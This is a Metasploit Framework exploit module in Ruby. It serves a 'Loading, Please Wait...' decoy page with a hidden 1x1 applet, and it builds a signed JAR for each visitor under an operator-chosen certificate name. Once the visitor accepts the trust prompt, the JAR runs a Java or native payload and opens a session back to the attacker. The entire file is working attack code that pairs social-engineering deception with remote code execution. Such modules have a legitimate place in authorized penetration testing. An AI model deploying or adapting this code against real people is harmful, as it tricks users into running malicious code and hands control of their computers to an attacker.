##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpServer::HTML
	include Msf::Exploit::Java
	include Msf::Exploit::EXE

	def initialize( info = {} )
		super( update_info( info,
			'Name'          => 'Signed Applet Social Engineering Code Exec',
			'Description'   => %q{
					This exploit dynamically creates an applet via the Msf::Exploit::Java mixin, converts it
				to a .jar file, then signs the .jar with a dynamically created certificate containing
				values of your choosing.  This is presented to the end user via a web page with an applet
				tag, loading the signed applet.

				The user's JVM pops a dialog asking if they trust the signed applet and displays the
				values chosen.  Once the user clicks 'accept', the applet executes with full user
				permissions.

				The java payload used in this exploit is derived from Stephen Fewer's and HDM's payload
				created for the CVE-2008-5353 java deserialization exploit.

				This module requires the rjb rubygem, the JDK, and the $JAVA_HOME variable to be set.
				If these dependencies are not present, the exploit falls back to a static, signed
				JAR.
			},
			'License'       => MSF_LICENSE,
			'Author'        => [ 'natron' ],
			'Version'       => '$Revision$',
			'References'    =>
			[
				[ 'URL', 'http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-valsmith-metaphish.pdf' ],
			],
			'Platform'      => [ 'java', 'win', 'osx', 'linux', 'solaris' ],
			'Payload'       => { 'BadChars' => '', 'DisableNops' => true },
			'Targets'       =>
				[
					[ 'Generic (Java Payload)',
						{
							'Platform' => ['java'],
							'Arch' => ARCH_JAVA
						}
					],
					[ 'Windows x86 (Native Payload)',
						{
							'Platform' => 'win',
							'Arch' => ARCH_X86,
						}
					],
					[ 'Linux x86 (Native Payload)',
						{
							'Platform' => 'linux',
							'Arch' => ARCH_X86,
						}
					],
					[ 'Mac OS X PPC (Native Payload)',
						{
							'Platform' => 'osx',
							'Arch' => ARCH_PPC,
						}
					],
					[ 'Mac OS X x86 (Native Payload)',
						{
							'Platform' => 'osx',
							'Arch' => ARCH_X86,
						}
					],
				],
			'DefaultTarget' => 1
		))
		register_options(
			[
				OptString.new(     'CERTCN', 	[ true, "The CN= value for the certificate.", "Metasploit Inc." ]),
				OptString.new( 'APPLETNAME',	[ true, "The main applet's class name.",      "SiteLoader"		]),
				OptString.new('PAYLOADNAME',	[ true, "The payload classes name.", 	      "SiteSupport" 	]),

				# Not implemented yet.
				#OptString.new('PACKAGENAME',	[ true, "The package name for gen'd classes.","x"		]),
				#OptString.new('CUSTOMJAR', 	[ false, "A custom .jar applet to use.", nil]),
			], self.class)
		register_advanced_options(
			[
				OptString.new('SaveToFile',		[ false, "When set, source is saved to this directory under external/source/", nil ])
			], self.class)
	end


	def on_request_uri( cli, request )
		payload = regenerate_payload(cli)
		if not payload
			print_error( "Failed to generate the payload." )
			# Send them a 404 so the browser doesn't hang waiting for data
			# that will never come.
			send_not_found(cli)
			return
		end

		if not request.uri.match(/\.jar$/i)
			if not request.uri.match(/\/$/)
				send_redirect( cli, get_resource() + '/', '')
				return
			end

			print_status( "Handling request from #{cli.peerhost}:#{cli.peerport}..." )

			send_response_html( cli, generate_html, { 'Content-Type' => 'text/html' } )
			return
		end

		# If we haven't returned yet, then this is a request for our applet
		# jar, build one for this victim.

		p = regenerate_payload(cli)
		jar = p.encoded_jar

		files = [
			"metasploit/Payload.class",
			"metasploit/PayloadApplet.class",
			"META-INF/MANIFEST.MF",
			"META-INF/SIGNFILE.DSA",
			"META-INF/SIGNFILE.SF",
		]

		# Ghetto.  Replace existing files in the Jar, then add in
		# anything that wasn't replaced.  The reason for replacing the
		# .class files is to ensure that we're sending the
		# Payload.class as was signed rather than a newer one that was
		# updated without updating the signature.  We'll just have to
		# cross our fingers and hope that any updates don't break
		# backwards compatibility in the handler until we can get
		# signing to work from ruby.  Once we can sign jars directly
		# from ruby using OpenSSL, this won't be a problem.
		replaced = []
		# Replace the ones that are already there.
		jar.entries.map do |e|
			file = File.join(Msf::Config.data_directory, "exploits", "java_signed_applet", e.name)
			if File.file? file
				File.open(file, "rb") do |f|
					e.data = f.read(f.stat.size)
				end
			end
			replaced << e.name
		end
		# Add the rest
		files.each { |e|
			next if replaced.include? e
			file = File.join(Msf::Config.data_directory, "exploits", "java_signed_applet", e)
			File.open(file, "rb") do |f|
				jar.add_file(e, f.read(f.stat.size))
			end
		}

		print_status( "Sending #{datastore['APPLETNAME']}.jar to #{cli.peerhost}:#{cli.peerport}.  Waiting for user to click 'accept'..." )
		send_response( cli, jar.pack, { 'Content-Type' => "application/octet-stream" } )

		handler( cli )

	end

	def generate_html
		html  = %Q|<html><head><title>Loading, Please Wait...</title></head> |
		html += %Q|<body><center><p>Loading, Please Wait...</p></center> |
		html += %Q|<applet archive="#{datastore["APPLETNAME"]}.jar" |
		html += %Q|  code="metasploit.PayloadApplet" width="1" height="1">\n|
		html += %Q|</applet></body></html>|
		return html
	end

end